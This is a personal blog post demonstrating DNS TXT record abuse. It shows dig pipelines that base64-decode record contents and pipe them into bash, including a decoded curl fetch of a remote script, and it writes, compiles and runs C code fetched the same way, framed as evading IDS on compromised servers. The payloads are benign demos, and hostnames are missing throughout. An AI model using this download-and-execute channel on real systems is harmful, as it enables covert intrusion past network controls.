Using DNS TXT Record Abuse for Exploiting Servers

With everything thats been in the news lately with malware and WannaCry, I figured it’d be fun to proof this out for myself and post about it. The below, of course, assumes that your environment has already been compromised or has someone on it that wants to do something nefarious (disgruntled employee?). I am going to show you, in its most simplistic form, how you can abuse DNS TXT records for leveraging passing data in between servers and more so, when the server you want to exploit is behind a firewall and can only do DNS requests

Why is this useful? This is useful because data in an TXT record can be any combination of ASCII text. What this means, simply, is that you are able to obfuscate data with GPG or, even more simply, base64 encode and decode. This is beneficial for hiding from an IDS or IPS.

DNS is everything. When things fail, its usually because of a DNS issue (within context, of course) but typically DNS traffic is relatively trusted in organizations. The abuse of DNS here is being in the context of, for instance, when a DNS server does not know of a record, when asked it, will forward a request to the root zones which will then attempt to try to find the controlling DNS server for the queried domain so that it can return a result for the queried hostname

Example: I am a server inside of an organization that has the ability to issue DNS requests. What this means is that I can request – my internal DNS server probably knows this already from cache and responds. What if I ask for My internal DNS server probably wont know this and will forward it up to the .net root DNS to ask .net where ckozler under .net is. .net responds with NS record Then is queried for the @ record for which responds with (the host for where you are reading this page)

So what happened here? I was able to “leave” the organization to request data from an external server and retrieve it and read it. Simply put, instead of being able to use curl or wget to request something from a remote web server, I used DNS to traverse the open internet and get input from a remote server. As I said earlier, TXT records can contain ASCII text. ASCII text means data and data means exploits.

Below I will show an example of this. I will describe the environment as well so hopefully after you reading this you can understand what is going on from a technical standpoint. It will be extremely high level, because I’m not hacker or security expert, but it will show you how you can move data between sites with DNS TXT records

The idea of obfuscating the data inside the TXT records is so that when IDS’ and IPS’ are inspecting the traffic, they arent able to really see “inside” of the response. All they see is a random array of ASCII text

DISCLAIMER: I am not a security expert or try to pose as one. I am simply showing how hackers and malware writers are able to leverage basic functions of networking that could be much harder to detect


‘client’ is an already compromised server inside an organization somewhere – whether it be a disgruntled employee or what not. The only requirement is that it can query DNS. Lets assume its locked down from outbound access to any server except the internal DNS server.

Again, there are a ton of assumptions here, I am just showing the concepts

I will show 2 examples. One is that I am fetching a remote bash script via curl and then executing it. The second is fetching C code and then compiling it and running it. Example 1 assumes HTTP/HTTPS outbound from the server is allowed and example 2 assumes the server has gcc installed

Example 1

client]$ dig -t TXT | grep ^txt	6601	IN	TXT	"Y3VybCAtcyAtcSBodHRwczovL2Nrb3psZXIubmV0L3JlbW90ZV9zaGVsbC50eHQu"

client]$ dig -t TXT | grep ^txt	7141	IN	TXT	"cGhwCg=="

client]$ dig -t TXT | grep '^txt' | awk '{ print $5 }' | tr -d '"' 

client]$ dig -t TXT | grep '^txt' | awk '{ print $5 }' | tr -d '"' | openssl enc -base64 -d 
curl -s -q

client]$ dig -t TXT | grep '^txt' | awk '{ print $5 }' | tr -d '"' | openssl enc -base64 -d | bash -s 
#!/usr/bin/env bash

echo "Hello world! I was downloaded from with instructions from a TXT DNS record"
exit 0

client]$ dig -t TXT | grep '^txt' | awk '{ print $5 }' | tr -d '"' | openssl enc -base64 -d | bash -s  | bash -s
Hello world! I was downloaded from with instructions from a TXT DNS record

So what happened? You can see that I can query and get data…then and get the second line of the base64 encoded strings. These two lines give me the lines from the bash script that is hosted at I then decode it and run it which then spits out “Hello world!”

The magic here is the base64 encoded data. Of course, I am sure IDS and IPS’ can pick this up but base64 is a good, quick, and easy way to obfuscate data and try to hide

This example just proofs the concept of how to move data or instructions in between a remote external DNS server and a “secured” internal server

Example 2

Now we’re going to fetch some C code from TXT records and run it. The previous example assumes HTTP/HTTPS (port 80 and 443) outbound towards is open. Well, what if this isnt the case? What if we, for instance, see that the kernel on server ‘client’ is susceptible to a privilege escalation exploit. Perfect! Lets get some code from DNS TXT records!

Note: Click the arrow in the top right to open the shell code in another window

# Get the first line of the base64 encoded C code
client]$ dig -t TXT | grep ^c_code_line 3599	IN	TXT	"I2luY2x1ZGUgPHN0ZGlvLmg+CmludCBtYWluKCkgewoJcHJpbnRmKCAiaGVsbG8g"

# Get the second line
client]$ dig -t TXT | grep ^c_code_line 3599	IN	TXT	"d29ybGRcbkkgd2FzIGRvd25sb2FkZWQgdGhyb3VnaCBhIFRYVCByZWNvcmQgYW5k"

# Get the third line
client]$ dig -t TXT | grep ^c_code_line 3599	IN	TXT	"IGNvbXBpbGVkIGxvY2FsbHkiICk7CglyZXR1cm4gMDsKfQo="

# Now get them all at once
client]$ dig -t TXT | grep ^c_code_line 3599	IN	TXT	"I2luY2x1ZGUgPHN0ZGlvLmg+CmludCBtYWluKCkgewoJcHJpbnRmKCAiaGVsbG8g" 3562	IN	TXT	"d29ybGRcbkkgd2FzIGRvd25sb2FkZWQgdGhyb3VnaCBhIFRYVCByZWNvcmQgYW5k" 3564	IN	TXT	"IGNvbXBpbGVkIGxvY2FsbHkiICk7CglyZXR1cm4gMDsKfQo="

# We still have quotes, want to get rid of them
client]$ dig -t TXT | grep ^c_code_line | awk '{ print $5 }'

# Now its cleaned up, its literal base64 encoded text
client]$ dig -t TXT | grep ^c_code_line | awk '{ print $5 }' | tr -d '"'

# When we pass it to openssl -d we can see the actual text
client]$ dig -t TXT | grep ^c_code_line | awk '{ print $5 }' | tr -d '"' | openssl enc -base64 -d
#include <stdio.h>
int main() {
	printf( "hello world\nI was downloaded through a TXT record and compiled locally" );
	return 0;

# Now lets pass it to a file and compile it with GCC
client]$ dig -t TXT | grep ^c_code_line | \
> awk '{ print $5 }' | tr -d '"' | \
> openssl enc -base64 -d > /var/tmp/txt.poc.c; gcc -o /var/tmp/txt.poc /var/tmp/txt.poc.c; /var/tmp/txt.poc
hello world
I was downloaded through a TXT record and compiled locally


So what you can see here is we were able to successfully move C code via TXT DNS records. Of course, large exploits would require many lines but things such as shell code privilege escalation exploits would be many less lines

I hope you found this post informative. Any mistakes I made or anything not clear please feel free to drop a line in the comments


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